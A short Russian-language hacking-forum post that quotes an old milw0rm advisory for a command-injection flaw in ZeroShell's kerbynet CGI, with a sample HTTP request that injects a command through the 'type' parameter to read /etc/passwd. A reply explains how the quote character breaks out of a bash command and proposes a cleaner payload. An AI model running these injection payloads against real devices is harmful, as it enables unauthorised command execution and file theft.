25.03.2016, 14:43
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от Bezlishke
↑
Код:
====================================================
ZeroShell ;%22
In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
# milw0rm.com [2009-02-09]
Заинтересовало, но не могу одуплить.
староватая конечно бага)
поле type участвует судя по всему в какой то баш команде, то есть
$ blablabla "blabla $type"
из за плохой фильтрации можно сделать инъекцию вида ";наша команда
%22 это как раз знак "
пайлоад у них правда странный *%22;;%22
имхо лучше так *%22;cmd;%23
|
|
|